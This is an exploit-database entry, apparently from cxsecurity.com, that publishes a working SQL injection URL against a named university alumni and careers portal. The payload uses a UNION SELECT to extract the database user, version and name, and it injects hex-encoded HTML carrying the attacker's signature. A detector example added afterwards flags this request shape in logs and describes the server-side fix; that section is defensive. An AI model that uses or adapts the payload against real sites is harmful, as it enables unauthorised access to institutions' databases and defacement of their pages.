Portal Alumni & Karir UIN Alauddin SQL Injection

2020.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Nick name : KHS1N Cyber 07
#Youtube : HCT Sec07
Vulnerability : #SQL Injection
domain site && payload :
http://alumnikarir.uin-alauddin.ac.id/lowongan_umum/fo-detail-lowongan-umum-outside.php?id=-19%27+union+select+1,2,3,concat(0x3c696d67207372633d27687474703a2f2f7777772e736168616261746365726461732e636f6d2f61737365742f666f746f5f6265726974612f4843545f7468756d626e61696c2e706e67273e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22726564222073697a653d2235223e496e6a656374204279204b4853314e2043796265722030373c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2233223e47656e657261736920506563696e74612054656e74652d54656e7465204769762c204c696665626f792c206c75782c2068616e64626f64792c204e796f6b2a702043722a2a743c2f666f6e743e3c2f703e,0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22677265656e222073697a653d2236223e557365723a3a3a3c2f666f6e743e3c2f703e,user(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d22626c7565222073697a653d2236223e56657273693a3a3a3c2f666f6e743e3c2f703e,version(),0x3c62723e,0x3c7020616c69676e3d226a757374696679223e3c666f6e7420666163653d22436f7572696572204e65772220636f6c6f723d226f72616e6765222073697a653d2236223e44617461626173653a3a3a3c2f666f6e743e3c2f703e,database()),5,6,7,8,9,10,11--+--
HCI Indonesia and for all member
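
Added example, not part of the original advisory or the submitter's code: a log-review check for the request shape shown above (a quote-broken id value, UNION SELECT, user()/version()/database() calls, and 0x hex literals that decode to HTML). The sample request lines are constructed, and treating id as an integer-only parameter is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request targets for illustration (not from a real log).
SAMPLE_REQUESTS = [
    "/lowongan_umum/fo-detail-lowongan-umum-outside.php?id=19",
    "/lowongan_umum/fo-detail-lowongan-umum-outside.php?id=-19%27+union+select"
    "+1,2,concat(0x3c62723e,user(),version(),database()),4--+-",
    "/search.php?q=student+union+election",
]

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
INFO_FUNCS = re.compile(r"\b(?:user|version|database)\s*\(\s*\)", re.I)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)


def decode_hex_literals(value):
    """Decode MySQL-style 0x... literals so an analyst can read them."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(value)]


def inspect_request(target, numeric_params=("id",)):
    """Return (param, reason) findings for one request target.

    numeric_params is an assumption: parameters the application is
    expected to receive as plain integers.
    """
    findings = []
    # parse_qsl percent-decodes the value and turns '+' into a space.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in numeric_params and not re.fullmatch(r"[0-9]+", value):
            findings.append((name, "non-numeric value in numeric parameter"))
        if UNION_SELECT.search(value):
            findings.append((name, "UNION SELECT"))
        if INFO_FUNCS.search(value):
            findings.append((name, "user()/version()/database() call"))
        for text in decode_hex_literals(value):
            if "<" in text:
                findings.append((name, "hex literal decodes to HTML: " + text))
    return findings


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req[:60], "->", inspect_request(req))
```

The integer check on id is the strongest signal here, and the same rule applied server-side (rejecting non-integer id values and binding the value as a query parameter) removes the injection point itself.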


Copyright 2024, cxsecurity.com

 
